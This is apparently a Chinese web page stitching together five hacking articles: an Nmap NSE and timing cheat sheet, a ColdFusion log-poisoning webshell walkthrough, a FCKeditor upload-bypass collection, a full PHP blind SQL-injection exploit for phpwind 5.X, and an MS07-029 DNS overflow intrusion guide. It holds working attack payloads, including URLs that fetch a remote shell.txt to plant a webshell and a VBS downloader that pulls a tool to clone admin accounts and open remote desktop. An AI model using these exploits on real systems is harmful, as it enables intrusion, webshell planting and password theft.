一 : Nmap备忘单：从探索到漏洞利用 第三章 NSE脚本的使用

众所周知NMAP是经常用来进行端口发现、端口识别。除此之外我们还可以通过NMAP的NSE脚本做很多事情，比如邮件指纹识别，检索WHOIS记录，使用UDP服务等。

发现地理位置

Gorjan Petrovski提交了个NMAP的NSE脚本，帮助我们定位远程IP的地理位置：ip-geolocation-maxmind，ip-geolocation-ipinfodb，和ipgeolocation-geobytes。

这将告诉我们如何设置并使用附带的NMAP NSE的地理位置脚本。

 ip-geolocation-maxmind

为了能调用该脚本，需要先下载MaxMind的城市数据库http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz。解压到本地的NMAP数据文件夹($Nmap_DATA/nselib/data/)。

命令：

Nmap  --script ip-geolocation-* ip

 提交新的地理位置提供商

有时地理位置可能是错误的，因为地理位置取决于的MaxMind数据库。因此我们必须给NMAP提供一个新的数据库。

 获得WHOIS记录信息

WHOIS记录通常包含如注册人的姓名和联系方式的重要数据。虽然这里有很多工具可以查询WHOIS协议，但NMAP的证明了自身的优秀，因为它能够批量处理IP范围和主机列表。

命令：Nmap --script whois 目标

 --script WHOIS查询参数告诉NMAP的，以获得给定目标的记录。此脚本使用IANA分配的数据来选择RIR，它的结果在本地缓存。另外，我们可以覆盖此行为，并选择服务提供商的说法whodb使用的顺序：

参数--script whois告诉NMAP去查询区域互联网注册管理机构WHOIS数据库来获得给定目标的whois记录。这个脚本使用IANA分配的数据选择RIR并在本地缓存结果。或者我们可以覆盖这一行为，指定whois数据库的提供商并依次查询。

命令：

Nmap --script whois --script-args whois.whodb=arin+ripe+afrinic <目标>

该脚本将会按顺序在WHOIS提供商中查询记录或者推荐记录，要忽略推荐记录请指定参数值nofollow。

命令：Nmap --script whois --script-args whois.whodb=nofollow <目标>

要批量查询的主机名列表（-iL <文件名>）的WHOIS记录而不启用端口扫描（-sn）。命令：Nmap -sn –script whois -v -iL hosts.txt (hosts.txt包含主机或者ip的列表)

禁用缓存

有时候whois查询返回的是缓存的结果而不是最新的，可以指定参数禁止查询缓存。

命令：

Nmap -sn --script whois -script-args whois.whodb=nocache scanme. Nmap.org

 

检查主机是否有恶意行为

NMAP通过调用谷歌安全浏览服务API来检查主机是否进行恶意软件分发或者网络钓鱼攻击的行为。

使用脚本http-google-malware之前，先获取谷歌安全浏览服务API的密钥：

https://developers.google.com/safe-browsing/key_signup?csw=1

命令：

Nmap -p80 -script http-google-malware -script-args http-google-malware.api=<API> <目标>

如果不使用API，也可以进行查询。

命令：Nmap -p80 --script http-google-malware -v scanme.Nmap.org

 

收集有效的邮箱

收集邮箱对渗透测试非常有用，我们可以对这些邮箱进行钓鱼工具或者暴力破解攻击。NMAP可以进行邮箱的收集，但是脚本http-google-email不在NMAP的官方资料库中，我们需要手动下载http://seclists.org/Nmap-dev/2011/q3/att-401/http-google-email.nse，并把它复制到本地脚本目录。正如你所看到的，下面的截图有电子邮件收集脚本的详细信息：

 

但作为一名安全研究人员必须要了解脚本，因为脚本可能包含恶意的东西。所以下面介绍关于脚本的详细信息。下面就是下载的脚本内容，这样你就不必再下载，可以直接使用该脚本。

找到所有的NSE脚本的最简单方法是使用find命令如下所示。

description = [[ http-google-email queries the Google web search engine and Google Groups for e-mails pertaining to a specific domain. ]]  --- -- @usage -- Nmap -p80 --script http-google-email <host> -- -- @output -- PORT STATE SERVICE -- 80/tcp open http -- | http-google-email: -- | Nmap-dev () insecure org -- | Nmap-svn () insecure org -- |_fyodor () insecure org -- -- @args http-google-email.domain Domain to search for. -- @args http-google-email.pages The number of results pages to be requested from Google Web search and Google Group search respectively. Default is 5. ---  author = "Shinnok" license = "Same as Nmap--See " categories = {"discovery", "safe", "external"}  require "http" require "shortport"  portrule = shortport.http  --Builds Google Web Search query --@param domain --@param page --@return Url local function google_search_query(domain, page)  return string.format("http://www.google.com/search?q=%%40%s&hl=en&lr=&ie=UTF-8&start=%s&sa=N", domain, page) end --Builds Google Groups Search query --@param domain --@param page --@return Url local function google_groups_query(domain, page)  return string.format("http://groups.google.com/groups?q=%s&hl=en&lr=&ie=UTF-8&start=%s&sa=N", domain, page) end  --- --MAIN --- action = function(host, port)  local pages = 50  local target  local emails = {}  if(stdnse.get_script_args("http-google-email.pages")) then  pages = stdnse.get_script_args("http-google-email.pages")*10  end  -- Check if we have the domain argument passed  if(stdnse.get_script_args("http-google-email.domain")) then  target = stdnse.get_script_args("http-google-email.domain")  else  -- Verify that we have a hostname available  if not(host.targetname) then  return string.format("[ERROR] Host can not be resolved to a domain name.")  else  target = host.targetname  end  end  stdnse.print_debug(1, "%s: Checking domain %s", SCRIPT_NAME, target) -- Google Web search  for page=0, pages, 10 do  local qry = google_search_query(target, page)  local req = http.get_url(qry)  stdnse.print_debug(2, "%s", qry)  stdnse.print_debug(2, "%s", req.body)  body = req.body:gsub('<em>', '')  body = body:gsub('</em>', '')  if body then  local found = false  for email in body:gmatch('[A-Za-z0-9%.%%%+%-]+@' .. target) do  for _, value in pairs(emails) do  if value == email then  found = true  end  end  if not found then emails[#emails+1] = email  end  end  end  end  -- Google Groups search  for page=0, pages, 10 do  local qry = google_groups_query(target, page)  local req = http.get_url(qry)  stdnse.print_debug(2, "%s", qry)  stdnse.print_debug(2, "%s", req.body)  body = req.body:gsub('<b>', '')  body = body:gsub('</b>', '')  if body then  local found = false  for email in body:gmatch('[A-Za-z0-9%.%%%+%-]+@' .. target) do  for _, value in pairs(emails) do  if value == email then  found = true  end  end  if not found then emails[#emails+1] = email  end  end  end  end  if #emails > 0 then  return "n" .. stdnse.strjoin("n", emails)  end end

find / -name ‘*.nse’

一般情况下的路径可能是usr/share/Nmap/scripts。

找到脚本文件所在的目录后，切换到这个目录，执行wget命令，当然你也可以手动拷贝一份到这个目录。

看下脚本内容是否正确。

拷贝了http-google-email.nse之后，我们需要手动更新脚本数据库，执行如下的命令：

Nmap -script-updatedb

更新完成后，就可以运行脚本了。

Nmap -p80 –script http-google-email <目标>

NSE脚本参数

选项–script-args是用于设置NSE脚本的参数。例如：

Nmap -sV --script http-title --script-args http.useragent=”Mozilla 999 ” <目标>

以上命令设置了参数useragent的值。

获取主机信息并进一步深入

作为一个专业的安全测试人员我们应该进一步获得关于网络或主机的附加信息去推动渗透测试。

-O参数用来探测目标操作系统:

命令：Nmap -O 目标

通过分析目标的响应是否符合某些操作系统的特征，从而判断目标操作系统的类型。为了能更准确的探测操作系统，目标主机至少要有一个开放的端口和关闭的端口。当扫描多个目标时，选项–osscan-limit可以忽略不满足这个要求的主机以加快扫描速度。使用选项-v可以展示扫描过程。

命令:Nmap -v -O 目标

在某些情况下NMAP不能确定操作系统时，它会显示一个指纹。该指纹可以提交到NMAP的数据库中（http://www.Nmap.org/submit/）

提交生成的指纹，并正确识别目标的操作系统，我们可以改善NMAP的操作系统检测功能在未来的版本中的准确性。

猜测操作系统

如果NMAP无法确定操作系统类型，通过选项–osscan-guess强制识别os。

命令：Nmap -O –osscan-guess 目标

它将列出的NMAP脚本数据库操作系统的所有可能的匹配。–fuzzy可以用作–osscan-guess的快捷方式。

如果目标至少有一个开放和一个关闭的TCP端口那么操作系统的类型识别会比较有效。选项–osscan-limit将会使NMAP不对没有满足这个要求的目标进行操作系统的识别。这样可以节省大量的时间，尤其是在对许多主机-Pn扫描。它只与选项-O或者-A搭配使用。

–max-OS-tries（设置针对目标的操作系统检测的最大尝试次数）

当NMAP针对目标进行操作系统检测，并未能找到一个完美的匹配时，它通常会重复尝试。默认情况下，如果环境条件比较好，NMAP会尝试五次，如果条件比较差那么只会尝试二次。指定 –max-os-tries的值比较低的话（比如1）会加快NMAP的速度，但可能会错过潜在的可识别的目标。

命令：map -O –max-os-tries 目标

 

扫描时显示调试信息

选项 –version-trace会让NMAP显示详细的扫描内容。

命令：Nmap -sV –version-trace 目标

 

执行RPC扫描

选项-sR对目标进行RPC（远程过程调用）扫描

命令：Nmap -sR 目标

上述-sR扫描的输出显示有关目标系统上运行的RPC服务的信息。RPC与Unix和Linux系统上的NFS（网络文件系统）服务关系很紧密。

NMAP扫描使用-hostmap选项

此hostmap脚本基于第三方服务，而官方版本只支持BFK的DNS历史记录。正如我前面所说的，下载脚本

（https://svn.Nmap.org/Nmap/scripts/hostmap-bfk.nse）并更新NMAP的脚本数据库，然后执行命令：

Nmap -p80 –script hostmap Nmap.org

这些参数–script hostmap -p80告诉NMAP的启动HTTP版的hostmap脚本，并限制只扫描80端口以加快这一任务。

该hostmap.nse查询两个不同的Web服务：BFK DNS记录和ip2hosts.com。 BFK DNS记录是一项免费服务，从公共DNS数据和ip2hosts收集其信息。这两项服务都是免费的，滥用他们将很有可能让你禁止使用该服务。

可以设定参数指定不同的搜索引擎。

Nmap -p80 –script hostmap –script-args hostmap.provider=BING  <目标>

Nmap -p80 –script hostmap –script-args hostmap.provider=BFK  <目标>

Nmap -p80 –script hostmap –script-args hostmap.provider=ALL  <目标>

为了保存扫描每个IP的主机名，使用参数hostmap.prefix。设置此参数将创建一个在我们的工作目录<前缀><目标>文件名的文件：

Nmap -p80 –script hostmap-script-ARGS hostmap.prefix=hostfile <目标>

暴力破解DNS记录

这是用于试图通过暴力枚举DNS主机名猜测常见的子域。指定DNS-brute.srv，dns-bruter也将尝试列举常见的DNS SRV记录。

 

NMAP的时间选项

时间选项是什么，为什么？

作为一个渗透测试人员，我们通常会在在NMAP上设置时间选项，但我们必须得了解时间选项是什么，为什么要设置这个选项？

我们使用NMAP的时候经常会遇到防火墙，这些防火墙会阻碍某些请求。我们会根据需求设置时间选项以加快或减慢NMAP的扫描速度。

当在快速网络中（比如内网）扫描大量的主机时，我们可能需要增加并行操作的数量以便更快的获得结果。另外在扫描速度慢的网络时（或在互联网上），你可能需要减慢扫描速度以获得更准确的结果，或者逃避入侵检测系统。下面是一些NMAP的时间选项。

时间参数

默认情况下我们扫描使用的NMAP是在几秒钟内开始扫描。但是我们可以通过设置时间参数进一步提高性能。NMAP支持下列的时间格式：

M-分钟

S-秒

MS-毫秒

H-小时

有时如何选择时间参数可能会让人感到困惑，我们将设置多少时间用于扫描。要解决这些问题，NMAP的提供了如下多种扫描时序选项。

命令：Nmap -T[0-5] 目标

选项0：

这是一个非常缓慢的扫描选项，以便防火墙或IDS不会阻断该请求。

命令：Nmap -T0 目标

 

选项1：

比选项0稍微快一点点的扫描速度，用于绕过防火墙和IDS。

命令:Nmap -T1 目标

虽然T0和T1对于避免IDS报警非常有用，但它们将会花非常多的时间来扫描数千个端口或者服务器。

选项2：

比较“礼貌”的选项，占用较少的带宽以及目标计算机的资源。

命令：Nmap -T2 目标

 

选项3：

这是nmap的默认选项，常规的扫描速度和资源占用。

命令：Nmap -T3 目标

选项4和5：

在T4和T5是一个非常快速和侵略性的扫描。假设在一个相当快速和可靠的网络中，T4可以加速扫描。T5则是在此基础之上牺牲了准确性。

命令:Nmap -T4/-T5 目标

 

并行选项：

作为一个pentester我们不应该通过一个接一个的扫描浪费我们的时间。相反，我们可以通过并行扫描来优化。NMAP将目标IP段进行分组，然后在一次扫描一个组。一般情况下较大的分组是更有效的。缺点直到整个分组完成才能知道目标主机的情况。

并行处理有两个选项：最大值和最小值。

min：

选项–min-parallelism用于指定并行端口扫描操作的最小数量。

Nmap –min-parallelism [数量] [目标]

手动设置–min-parallelism选项可能会提升扫描性能,设置过高可能会产生不准确的结果。

MAX:

选项–max-parallelism用于指定并行端口扫描操作的最大数量。

Nmap –max-parallelism [数量] [目标]

 

主机分组大小选项：

nmap也可以设置主机分组的最大值和最小值。

MAX:

选项–max-hostgroup用于指定的Nmap并行扫描主机数的最大值。

Nmap –max-hostgroup [数目] [目标]

Min:

选项–min-hostgroup用于指定的Nmap并行扫描主机数的最小值。

Nmap –min-hostgroup [数目] [目标]

在扫描一个IP段或整个子网时NMAP将并行扫描多个目标以节省时间。默认情况下，基于扫描类型和网络条件Nmap会 自动调整正在执行的主机组的大小。通过指定–min-hostgroup选项，Nmap尝试保持主机组的大小为指定值。

设置最大值会有效避免网络拥堵和避免网内安全设备的告警。

RTT 超时

TCP连接中，RTT（往返超时）是用于在通信中的滑动窗口协议超时值的测定，并依赖于以下要点：如果超时值太小，源很快就超时，造成不必要的重传；另一方面，如果在超时值太大，则源会花费太长的时间以从错误中恢复。

NMAP会维持一个超时值，决定它等待探针响应的时间，以及再次发送探针的间隔。这是基于以前的探针的响应时间来计算。

在扫描过程中，Nmap计算这些响应时间值的内部流程如下：

SRTT - 平滑往返时间：这个响应时间的 估算是基于观察客户端到服务端之间的通信状况如何。这个值以微秒计算。

RTTVAR - 往返时间方差：网络通信可以是非常难以预测的，而Nmap通过创造一系列超时值去补偿这种不确定性。如果未在此方差内接收响应，则Nmap认为这一个响应不可能永远出现。

NMAP初始超时

它控制网络响应初始超时。

命令：Nmap –initial-rtt-timeout [时间] [目标]

增加时间值将减少因超时分组重发的次数。通过降低值我们可以加快扫描，但我们必须小心这样做。设置RTT超时值太低，可以抵消任何潜在的性能提升，并导致结果不准确。

RTT最大值

选项–max-rtt-timeout用于指定最大RTT(往返时间)数据包响应超时。

命令：Nmap –max-rtt-timeout [时间] [目标]

默认情况下为达到最佳效果Nmap会动态调整RTT超时选项。最大RTT超时缺省值为10秒。手动降低 最大RTT超时将允许更快的扫描（尤其是当扫描大块地址）。提高最大RTT超时将防止Nmap在网络状况不佳的情况进行扫描时过早地放弃。典型值是在 100毫秒（快速/可靠的网络）和10000毫秒（ 慢速/不可靠的网络）之间。

最大尝试次数

这个选项用于设置每个探针最大的重复次数。

命令：Nmap –max-retries [数目] [目标]

默认情况下，Nmap基于网络状况自动调整探针重传次数。如果我们要覆盖默认设置或解决连接问题的可以使用–max-retries选项。指定的数值会增加它完成一个扫描需要的时间，但会产生更精确的结果。降低–max-retries 我们可以加快扫描，但我们可能无法得到准确的结果。

TTL选项

TTL（存活时间）是因特网协议（IP）报文分组中的一个值，用于告诉网络路由器分组是否已经在网络中的时间过长而应丢弃。从渗透测试者的角度来看，一个TTL值可以帮助了解有关目标的大量信息。

选项–ttl用于指定扫描中的ttl值。

命令：Nmap –ttl [时间] [目标]

使用此选项发送的数据包都会有指定的TTL值。扫描目标时连接速度很慢，其中正常数据包可能会接收到响应之前超时，此选项很有用。

主机超时选项

选项–host-timeout指定Nmap在超时多少时间后放弃对主机的扫描。

命令：Nmap –host-timeout [时间] [目标]

如果它位于慢速或不可靠的网络上主机可能需要较长的时间来扫描。由速率限制防火墙保护的系统也可能需要相当长的时间来进行扫描。选项–host-timeout指示Nmap如果如果指定时间内未能完成扫描则放弃目标。在上述的例子中，扫描实际上花费更长的时间（超过一分钟）才能完成，这将导致的Nmap终止扫描（因为已经指定一分钟内）。扫描跨WAN或Internet连接的多个系统时，此选项特别有用。

最小扫描延迟

选项–scan-delay指示Nmap在发送探针之间的指定的最小时间间隔是多久。

命令：Nmap –scan-delay [时间] [目标]

一些系统会采用速率限制阻碍Nmap扫描尝试。默认情况下Nmap会检测系统的速率限制自动调节扫描延迟。在某些情况下我们需要自己设置扫描延迟比如在限速或有IDS防护的情况下。

最大扫描延迟

选项–max-scan-delay指示Nmap在发送探针之间的指定的最大时间间隔是多久。

命令：Nmap –max-scan-delay [时间] [目标]

指定–max-scan-delay这样可以加快扫描，但是会降低扫描精度，同时网络负载会变大。

最小发包速率

选项–min-rate用来指定Nmap每秒钟发送的数据包数量最小是多少。

命令:Nmap –min-rate [数量] [目标]

 

最大发包速率

选项–max-rate用来指定Nmap每秒钟发送的数据包数量最大是多少。

命令：Nmap –max-rate [数量] [目标]

在上面的例子中，–max-rate 30指示Nmap每秒发送不超过30个数据包。这会大大减缓扫描速度，但对试图躲避入侵检测系统或者扫描有速率限制的目标有帮助。

绕过RST包速率限制

选项–defeat-rst-ratelimit用于通过发送RST（重置请求）包来进行速率限制的主机。

命令：Nmap –defeat-rst-ratelimit [目标]

选项–defeat-rst-ratelimit在目标通过发送RST包来限制扫描速率的情况下非常有用，它可以加快扫描速度，然而会影响结果的准确度。不过这种情况非常少见，正因如此也很少使用这个选项。

到这里文章就结束了，在下一部分，我会介绍如何使用nmap进行防火墙绕过，Web服务审计，Web应用程序渗透测试，以及Nmap脚本引擎的开发。

引用：

http://www.professormesser.com/nmap/hacking-nmap-using-nmap-to-calculate-network-response-time/5/

 *参考来源：resources.infosecinstitute，FB小编东二门陈冠希编译，转载请注明来自FreeBuf黑客与极客（FreeBuf.COM）

二 : cfm本地包含漏洞利用

1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码

2.本地包含coldfusion日志,写cfm一句话,得到WEBSHELL

http://www.2cto.com /index.cfm?action=../../../../../../../../../../CFusionMX7/logs/application.log%00

http://www.2cto.com /index.cfm?action=<CFHTTP METHOD=Get URL=#URL.u# PATH=#URL.p# FILE=#URL.f#>

http://www.2cto.com /index.cfm?action=..\..\..\CFusionMX7\logs\application.log%00&u=http://www.pentest.cc/shell.txt&p=c:\inetpub\wwwroot\&f=shell.cfm

成功条件：

1.WEB目录可写

2.coldfusion目录和web目录在同一个分区

3.多个牛人的群策群力

未解决的问题：

1.iis的日志会把空格变成+，不知道怎么绕过

2.coldfusion会把单引号和双引号加倍处理，不知道怎么绕过去（师傅也遇到这个问题了，哈哈）

摘自 mickey&#39;s blog

三 : Fckeditor漏洞利用总结

 查看编辑器版本
fckeditor/_whatsnew.html
—————————————————————————————————————————————————————————————

2. version 2.2 版本
apache+linux 环境下在上传文件后面加个.突破！测试通过。
—————————————————————————————————————————————————————————————

3.version <=2.4.2 for php 在处理php 上传的地方并未对media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。
<form id="frmupload" enctype="multipart/form-data"
action="http://www.site.com/fckeditor/editor/filemanager/upload/php/upload.php?type=media" method="post">upload a new file:<br>
<input type="file" name="newfile" size="50"><br>
<input id="btnupload" type="submit" value="upload">
</form>
—————————————————————————————————————————————————————————————

4.fckeditor 文件上传“.”变“_”下划线的绕过方法
        很多时候上传的文件例如：shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版fck 的变化。
    4.1：提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
    4.2：继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。
—————————————————————————————————————————————————————————————

5. 突破建立文件夹
fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createfolder&type=image&currentfolder=%2fshell.asp&newfoldername=z&uuid=1244789975684
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=createfolder&currentfolder=/&type=image&newfoldername=shell.asp
—————————————————————————————————————————————————————————————

6. fckeditor 中test 文件的上传地址
fckeditor/editor/filemanager/browser/default/connectors/test.html
fckeditor/editor/filemanager/upload/test.html
fckeditor/editor/filemanager/connectors/test.html
fckeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————

7.常用上传地址
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?command=getfoldersandfiles&type=image&currentfolder=/
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/asp/connector.asp
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=http://www.site.com%2ffckeditor%2feditor%2ffilemanager%2fconnectors%2fphp%2fconnector.php (ver:2.6.3 测试通过)
jsp 版：
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/jsp/connector.jsp
注意红色部分修改为fckeditor 实际使用的脚本语言，蓝色部分可以自定义文
件夹名称也可以利用../..目录遍历，紫色部分为实际网站地址。
—————————————————————————————————————————————————————————————

8.其他上传地址
fckeditor/_samples/default.html
fckeditor/_samples/asp/sample01.asp
fckeditor/_samples/asp/sample02.asp
fckeditor/_samples/asp/sample03.asp
fckeditor/_samples/asp/sample04.asp
一般很多站点都已删除_samples 目录，可以试试。
fckeditor/editor/fckeditor.html 不可以上传文件，可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址
version 2.4.1 测试通过
修改currentfolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?command=createfolder&type=image&currentfolder=../../..%2f&newfoldername=shell.asp
根据返回的xml 信息可以查看网站所有的目录。
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?command=getfoldersandfiles&type=image&currentfolder=%2f
也可以直接浏览盘符：
jsp 版本：
fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?command=getfoldersandfiles&type=&currentfolder=%2f
—————————————————————————————————————————————————————————————

10.爆路径漏洞
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?command=getfoldersandfiles&type=file&currentfolder=/shell.asp
—————————————————————————————————————————————————————————————

11. fckeditor 被动限制策略所导致的过滤不严问题
        影响版本: fckeditor x.x <= fckeditor v2.4.3
脆弱描述：
fckeditor v2.4.3 中file 类别默认拒绝上传类型：
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sfilepath = $sserverdir . $sfilename，而没有使用$sextension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
        而在apache 下，因为"apache 文件名解析缺陷漏洞"也可以利用之，另建议其他上传漏洞中定义type 变量时使用file 类别来上传文件,根据fckeditor 的代码，其限制最为狭隘。
        在上传时遇见可直接上传脚本文件固然很好，但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过，也可以利用XX 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
—————————————————————————————————————————————————————————————

12.最古老的漏洞，type文件没有限制！
        我接触到的第一个fckeditor漏洞了。版本不详，应该很古老了，因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=image 改成type=hsren 这样就可以建立一个叫hsren的文件夹，一个新类型，没有任何限制，可以上传任意脚本！
—————————————————————————————————————————————————————————————

        以上方法都是网上收集和在平时渗透中所总结的经验，可能有些有遗漏，当再想起的时候再补充，也有自己没发现的就要靠各位大侠分享学习了!
 

四 : phpwind Exp 漏洞利用

忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来. 
 程序代码
<?php
print_r("

+------------------------------------------------------------------+

Exploit For Phpwind 5.X Version
BY  Loveshell
Just For Fun :)

+------------------------------------------------------------------+
");


ini_set("max_execution_time",0);
error_reporting(7);

$bbspath="$argv[2]";
$server="$argv[1]";
$cookie='1ae40_lastfid=0; 1ae40_ol_offset=776; 1ae40_ck_info=%2F%09.72m.net; 1ae40_winduser=A1QKBgE9UFxUUwAHDloFUAMIAFxeUgIMWgFUVVYDAA8HBFQNUVA%3D; 1ae40_lastvisit=0%091173612527%09%2Fbbs%2Findex.php%3F;
$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
$uid=intval($argv[3])>0 ? intval($argv[3]):1;

echo "rn#Loggingt........";
if(islogin()) echo "Login Ok!rn";
else die("Not Login!tCheck Your Cookie and Useragent!rn");


echo "#Testingt........";
if(test()) echo "Vul!rn";
else die("Not Vul");


$hashtable='0123456789abcdef';
$count=0;

echo "#Crackingtrnrn";

for($i=1;$i<=16;$i++){
    echo "第t$it位:";
    $subpass=crack($i+8);
    $password=$password.$subpass;
    echo "$subpassrn";
}

echo "Password:t$password";

echo "rnGood Luck $count Timesrn";


function send($cmd,$path)
{
  global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;

  $path=$bbspath."$path";
  $message = "POST ".$path." HTTP/1.1rn";
  $message .= "Accept: */*rn";
  $message .= "Accept-Language: zh-cnrn";
  $message .= "Referer: http://".$server.$path."rn";
  $message .= "Content-Type: application/x-www-form-urlencodedrn";
  $message .= "User-Agent: ".$useragent."rn";
  $message .= "Host: ".$server."rn";
  $message .= "Content-length: ".strlen($cmd)."rn";
  $message .= "Connection: Keep-Alivern";
  $message .= "Cookie: ".$cookie."rn";
  $message .= "rn";
  $message .= $cmd."rn";

  $count=$count+1;
  $fd = fsockopen( $server, 80 );
  fputs($fd,$message);
  $resp = "<pre>";
  while($fd&&!feof($fd)) {
  $resp .= fread($fd,1024);
  }
  fclose($fd);
  $resp .="</pre>";
  if($debug) {echo $cmd;echo $resp;}
//  echo $resp;
  return $resp;
}


function sqlject($sql){
    global $uid;
    $data='action=pubmsg&readmsg=0)';
    $data=$data." union select BENCHMARK(1000000,md5(12345)) from pw_members where uid=$uid and $sql".'/*';
    $echo=send($data,'message.php');
    preg_match("/Total (.*)(/i",$echo,$matches);
    if($matches[1]>2) return 1;
    else return 0;
}

function test(){
    global $uid;
    $data='action=pubmsg&readmsg=0)';
    $echo=send($data,'message.php');
    if(strpos($echo,'MySQL Server Error'))    return 1;
    else return 0;
}

function islogin(){
    global $uid;
    $data='action=pubmsg&readmsg=0)';
    $echo=send($data,'message.php');
    if(strpos($echo,'login.php"')) return 0;
    else return 1;
}

function crack($i){
global $hashtable;

$sql="mid(password,$i,1)>0x".bin2hex('8');
if(sqlject($sql)){
    $a=8;
    $b=15;}
else {
    $a=0;
    $b=8;
}


for($tmp=$a;$tmp<=$b;$tmp++){
    $sql="mid(password,$i,1)=0x".bin2hex($hashtable[$tmp]);
    if(sqlject($sql)) return $hashtable[$tmp];
}
crack($i);
}
?>
点击下载此文件

五 : MS07-029漏洞利用入侵过程

前言：
MS07-029，Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁，开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
今天，就让我带领各路英豪，踏上DNS EXP之路。
我们先来看看所用工具的界面：

这就是传说中的利用工具，可以通杀2000SEVER，2003SEVER系统，另外还具备了扫描功能！
先用它来对主机进行扫描：
在我们的命令行下输入：“dns –s 目标IP地址”

稍等片刻，开放的端口以及操作系统以出现在我们面前，如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你，你马上就会成功得到这台主机的权限了
上图意思就是1029端口存在漏洞。
现在我们来最关键的步骤――溢出：
在命令行内输入
dns -2003chs *.*.93.189 1029
其中-2003ch的意思是操作系统的型号，-2003chs即简体中文版的2003系统，
如果是2000的系统就使用“-2000all”参数，*.*.93.189就是我们的目标IP地址，1029就是刚才扫描出存在漏洞的端口”。

出现“Attack sent ,check port 1100”字样，说明已经打开了目标地址的1100端口，我们TELNET上去：TELNET *.*.93.189 1100

我们现在已经成功的入侵了对方的电脑，并且得到了管理员的权限。
下面我给大家介绍一下如何在肉鸡上面开3389，
在命令行里输入
@echo with wscript:if .arguments.count^ tony.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >> tony.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs
大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs
然后把开3389的工具上传到你的个人空间,
我这里用的是火狐开3389的工具，在命令行里输入 cscript tony.vbs http://你空间地址/wrsky.exe c:wrsky.exe

“wrsky.exe -c”可以克隆当前管理员帐号
再输入“c:wrsky.exe -o 3551”


意思就是打开对方的远程桌面服务，并且使用3551端口。
用“wrsky.exe -k”可以检查3389是否开启，开启以后输入“wrsky.exe -r”,对方的电脑就自动重启以后就可以连接上去了。
在运行里输入"mstsc",登陆上去。

那熟悉而又亲切的画面出现在我们面前了。
如果是2K的系统，还有一个更加傻瓜化的工具open3389，直接运行就可以了，不需要任何参数，不过对方电脑会马上重启。
另外我还放了其他两个DNS利用工具和一篇ZWELL的精华文章在光盘里，有兴趣的朋友可以自己研究。
这个漏洞的危害是是分巨大的，目前利用DNS服务RPC漏洞传播的蠕虫病毒VanBot已经出现，变种已经开始疯狂传播。
WIN 2K或2003的朋友请赶快下载补丁
http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx
或者打开记事本，输入：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDNSParameters]
"RpcProtocol"=dword:00000004
保存为扩展名为 .REG 的文件，双击导入，再重新启动 DNS 服务即可。
本文标题：漏洞利用-Nmap备忘单：从探索到漏洞利用 第三章 NSE脚本的使用
本文地址： http://www.61k.com/1083978.html